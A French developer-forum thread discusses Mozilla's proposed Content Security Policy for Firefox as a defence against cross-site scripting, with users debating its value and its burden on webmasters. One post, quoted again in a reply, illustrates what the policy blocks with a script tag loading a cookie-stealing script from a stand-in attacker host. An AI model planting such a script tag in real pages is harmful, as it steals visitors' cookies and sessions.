Navigation

Inscrivez-vous gratuitement
pour pouvoir participer, suivre les réponses en temps réel, voter pour les messages, poser vos propres questions et recevoir la newsletter

  1. #1
    Expert éminent sénior

    Inscrit en
    juillet 2009
    Messages
    3 407
    Détails du profil
    Informations forums :
    Inscription : juillet 2009
    Messages : 3 407
    Points : 148 400
    Points
    148 400
    Par défaut Firefox : Mozilla présente une idée pour révolutionner la sécurité d'Internet
    Firefox : Mozilla présente une idée pour révolutionner la sécurité du Web
    Les sites pourront définir eux-mêmes les contenus légitimes à afficher


    La Fondation Mozilla, derrière le navigateur Firefox, travaille sur une technologie qui ferait "faire un bond dans le futur à la sécurité du Net".

    L'idée de la fondation est d'intégrer une sorte de police d'assurance aux sites. Nommée "Content Security Policy" (CSP), cette technologie permettra au site de communiquer au navigateur les contenus légitimes qui le composent. Le navigateur n'exécutera donc plus que ce qui est véritablement crée par le développeur de la page mettant ainsi fin – d'après Mozilla – aux attaques de types cross-site scripting (XSS).

    Le cross-site scripting est un type de faille de sécurité que l'on trouve dans les applications Web. Elles peuvent être utilisées par un attaquant pour faire des redirections vers des pages web contenant du code douteux.

    La "Content Security Policy" est "semblable à NoScript," explique Brandon Sterne, Security Program Manager chez Mozilla "La différence c'est qu'ici ce n'est pas l'utilisateur mais le site qui décide de bloquer les contenus". NoScript est une extension de Firefox, très populaire auprès des utilisateurs, qui permet à l'internaute de bloquer comme bon lui semble les scripts en Java, JavaScript ou Flash.

    La balle est aujourd'hui dans le camp des développeurs Web. Le succès de cette initiative dépendra en effet totalement de son acceptation par la communauté. Avec un peu plus de 20% de part de marché des navigateurs, Firefox a des arguments à faire valoir mais la tache reste grande face à Internet Explorer, le navigateur de Microsoft qui lui embarque une technologie différente contre le XSS (depuis IE 8).

    La firme de Redmond a néanmoins qualifié cette "approche intéressante" de "bonne idée".

    "C'est génial de voir que les autres prennent également cette menace au sérieux" déclare Sterne de son coté.

    L'intégration des CSP à Firefox ne se fera pas dans la prochaine mise à jour du navigateur prévue le 13 Octobre prochain mais "après Firefox 3.6, pas avant" déclare le développeur, sans plus de précision.

    En attendant, une démo a été mise en ligne par Mozilla pour illustrer la nouvelle technologie de sécurité qu'elle essaye de faire adopter.

    Avec quel succès ?

    Source :
    Le Blog de Mozilla sur la Sécurité.
    Les billets du blog de Microsoft sur Internet Explorer ici et ici.

    Lire aussi :

    Pas de "ruban" pour Firefox 4

    La Rubrique développement Web (actu, tuto, FAQ, forums) de Développez.com
    Et celle sur la Sécurité

    Et vous ? :

    Pensez-vous que cette idée soit bonne ?
    A-t-elle une chance de s'imposer ?

  2. #2
    Membre confirmé Avatar de Inazo
    Profil pro
    Gérant - société de développement web
    Inscrit en
    avril 2007
    Messages
    417
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations professionnelles :
    Activité : Gérant - société de développement web
    Secteur : High Tech - Multimédia et Internet

    Informations forums :
    Inscription : avril 2007
    Messages : 417
    Points : 592
    Points
    592
    Par défaut
    Bonjour,

    Pour ma part bonne idée. Mais il faudrait faire attention à ne pas avoir autant de système de ce type, que de navigateur sinon on ne s'en sortira pas et cela finira par tomber dans l'oublie.

    Mais j'ai une autre question comment est déclaré le contenu ? Car rien n'empêche de Hacker le site et de donc de déclarer du contenu "propre" alors qu'il est largement vérolé. Et la c'est donc l'effet inverse qui se produira les internautes faisant confiance se feront avoir.

    Donc à surveiller tout de même notamment sur l'intégration et la déclaration de contenu "valide" et aussi sur les possibles exploitation qui seront possible de ce nouvel outil.

    Cordialement,

  3. #3
    Expert éminent sénior
    Avatar de Médinoc
    Homme Profil pro
    Développeur informatique
    Inscrit en
    septembre 2005
    Messages
    27 051
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 35
    Localisation : France

    Informations professionnelles :
    Activité : Développeur informatique
    Secteur : High Tech - Éditeur de logiciels

    Informations forums :
    Inscription : septembre 2005
    Messages : 27 051
    Points : 40 213
    Points
    40 213
    Par défaut
    Hacker le site sort du domaine du "cross-site scripting", donc de cette protection.

    De toute façon, si tu hackes le site, il y a plus simple à faire que déclarer ton code off-site comme authentique: Tu peux directement coller ton code sur le site!
    SVP, pas de questions techniques par MP. Surtout si je ne vous ai jamais parlé avant.

    "Aw, come on, who would be so stupid as to insert a cast to make an error go away without actually fixing the error?"
    Apparently everyone.
    -- Raymond Chen.
    Traduction obligatoire: "Oh, voyons, qui serait assez stupide pour mettre un cast pour faire disparaitre un message d'erreur sans vraiment corriger l'erreur?" - Apparemment, tout le monde. -- Raymond Chen.

  4. #4
    Membre confirmé Avatar de Inazo
    Profil pro
    Gérant - société de développement web
    Inscrit en
    avril 2007
    Messages
    417
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations professionnelles :
    Activité : Gérant - société de développement web
    Secteur : High Tech - Multimédia et Internet

    Informations forums :
    Inscription : avril 2007
    Messages : 417
    Points : 592
    Points
    592
    Par défaut
    Si le but et de faire une attaque type XSS, il me sera plus facile de berner l'utilisateur si mon contenu est déclaré comme sans risque non ? Car si le Hack est réalisé oui il y aura copier/coller du code malicieux mais aussi annonce via ce plugin que le code est sans danger.

    Donc l'internaute n'aura aucune raison valable de se méfier. Attention je ne dit pas que cela se fera simplement comme Hack, ni qu'il faut bouder cette idée ou que le JS est un fléau etc.

    Bien sur c'est une vue très "bizarre" de ma part sur cet outil qui est vraiment intéressant.

    Il est vrai qu'il est expliqué que la déclaration de code comme OK se fait via un fichier spécifique et via des entêtes envoyé à Firefox. Bien sur un attaquant qui "aurait la maîtrise complète du serveur" pourrait simplement faire sauter le fichier et ne plus dire si le contenu et bon ou mauvais. Mais faire croire que le contenu est sans risque est bien plus "malin".

    Enfin ce n'est qu'une idée.

    Cordialement,

  5. #5
    Expert éminent sénior
    Avatar de Médinoc
    Homme Profil pro
    Développeur informatique
    Inscrit en
    septembre 2005
    Messages
    27 051
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 35
    Localisation : France

    Informations professionnelles :
    Activité : Développeur informatique
    Secteur : High Tech - Éditeur de logiciels

    Informations forums :
    Inscription : septembre 2005
    Messages : 27 051
    Points : 40 213
    Points
    40 213
    Par défaut
    Ce que je veux dire, c'est que si tu peux forcer le site "piégé" à déclarer ton contenu comme sans risque, tu n'as plus besoin du XSS. Tu as déjà ouvert la porte, inutile de la dégonder en plus...

    Voir aussi et aussi et aussi...
    SVP, pas de questions techniques par MP. Surtout si je ne vous ai jamais parlé avant.

    "Aw, come on, who would be so stupid as to insert a cast to make an error go away without actually fixing the error?"
    Apparently everyone.
    -- Raymond Chen.
    Traduction obligatoire: "Oh, voyons, qui serait assez stupide pour mettre un cast pour faire disparaitre un message d'erreur sans vraiment corriger l'erreur?" - Apparemment, tout le monde. -- Raymond Chen.

  6. #6
    Membre confirmé Avatar de Inazo
    Profil pro
    Gérant - société de développement web
    Inscrit en
    avril 2007
    Messages
    417
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations professionnelles :
    Activité : Gérant - société de développement web
    Secteur : High Tech - Multimédia et Internet

    Informations forums :
    Inscription : avril 2007
    Messages : 417
    Points : 592
    Points
    592
    Par défaut
    Je ne dit pas le contraire et je pense qu'on c'est compris.

    Cordialement,

  7. #7
    Membre chevronné
    Profil pro
    Inscrit en
    janvier 2007
    Messages
    1 448
    Détails du profil
    Informations personnelles :
    Âge : 35
    Localisation : France, Paris (Île de France)

    Informations forums :
    Inscription : janvier 2007
    Messages : 1 448
    Points : 2 091
    Points
    2 091
    Par défaut
    Ce que tu dis toi, sa fait plus peur .... N'y pensons pas.

    Sur le principe je suis assez ok avec mozilla.
    Dans la réalité j'y porte assez peu de crédit du fait de la lourdeur indue qui me semble rentrer en contradiction avec ce qu'est le trio html/css/javascript.

    En effet tous trois ont toujours étaient utilisables dans le même flots d'instructions sans aucune distinction, c'est les bases du dhtml.

    Hors avec leur techno, ce n'est plus possible.
    Tout script doit être externe ce qui casse l'existant et créé une lourdeur quotidienne pour des équipes de webmastering qui ne souci guère des contraintes techniques.
    Je ne parle même pas du webmaster amateur.

    Au mieux, peut on espérer une croissance pousser par l'e-commerce, pour à termes forcer l'adoption de cette techno sur les sites professionnels.

  8. #8
    Modérateur
    Avatar de grunk
    Homme Profil pro
    Architecte Web / Android
    Inscrit en
    août 2003
    Messages
    5 543
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 35
    Localisation : France, Côte d'Or (Bourgogne)

    Informations professionnelles :
    Activité : Architecte Web / Android
    Secteur : Industrie

    Informations forums :
    Inscription : août 2003
    Messages : 5 543
    Points : 14 983
    Points
    14 983
    Par défaut
    Citation Envoyé par kaymak Voir le message
    Ce que tu dis toi, sa fait plus peur .... N'y pensons pas.
    Dans la réalité j'y porte assez peu de crédit du fait de la lourdeur indue qui me semble rentrer en contradiction avec ce qu'est le trio html/css/javascript.

    En effet tous trois ont toujours étaient utilisables dans le même flots d'instructions sans aucune distinction, c'est les bases du dhtml.
    Avec cette techno un simple header suffit , rien d'autre à changer :
    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    X-Content-Security-Policy: allow 'self'
    Ne permettra le chargement que des ressource du même domaine que le site.
    Ainsi un petit malin qui utiliserais
    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    <script type="text/javascript" src="http://pirate.com/jevoletescookie.js"></script>
    se verrait refuser l'execution du script
    Pry Framework php5 | N'oubliez pas de consulter les FAQ Java et les cours et tutoriels Java

  9. #9
    Membre chevronné
    Profil pro
    Inscrit en
    janvier 2007
    Messages
    1 448
    Détails du profil
    Informations personnelles :
    Âge : 35
    Localisation : France, Paris (Île de France)

    Informations forums :
    Inscription : janvier 2007
    Messages : 1 448
    Points : 2 091
    Points
    2 091
    Par défaut
    Citation Envoyé par grunk Voir le message
    Avec cette techno un simple header suffit , rien d'autre à changer :
    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    X-Content-Security-Policy: allow 'self'
    Ne permettra le chargement que des ressource du même domaine que le site.
    Ainsi un petit malin qui utiliserais
    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    <script type="text/javascript" src="http://pirate.com/jevoletescookie.js"></script>
    se verrait refuser l'execution du script
    Oui mais la dite techno t'empêche d'inclure du code js dans ton flot html avec les balises <script>, ou sur un attribut onclick d'une balise html.

    Il est là le problème, la techno t'obliges à sortir ces instructions vers un fichier externe pour le référencer dans ton fichier de ressources déclarées.


    En plus, ceci :
    X-Content-Security-Policy: allow 'self'
    N'est pas suffisant. Rien que les tags tracking de partenaires nécessite plus de permissions ; )
    Rien que le tag google n'est plus valide ; )

    PS
    A noter que d'un point de vu purement programmeur, c'est plutôt une bonne chose.... Mais le web est un mélange d'éditeur de contenu et de dév : )

Discussions similaires

  1. Réponses: 19
    Dernier message: 14/02/2013, 16h49
  2. Réponses: 50
    Dernier message: 12/04/2007, 12h04
  3. [eCommerce] Une idée pour un script ?
    Par samoth dans le forum EDI, CMS, Outils, Scripts et API
    Réponses: 2
    Dernier message: 31/07/2006, 10h49
  4. Une idée pour un débutant
    Par poutine dans le forum C
    Réponses: 15
    Dernier message: 04/05/2006, 22h54
  5. Une idée pour utiliser ce type de fichier data??
    Par Frenchy dans le forum DirectX
    Réponses: 2
    Dernier message: 14/02/2006, 14h24

Partager

Partager
  • Envoyer la discussion sur Viadeo
  • Envoyer la discussion sur Twitter
  • Envoyer la discussion sur Google
  • Envoyer la discussion sur Facebook
  • Envoyer la discussion sur Digg
  • Envoyer la discussion sur Delicious
  • Envoyer la discussion sur MySpace
  • Envoyer la discussion sur Yahoo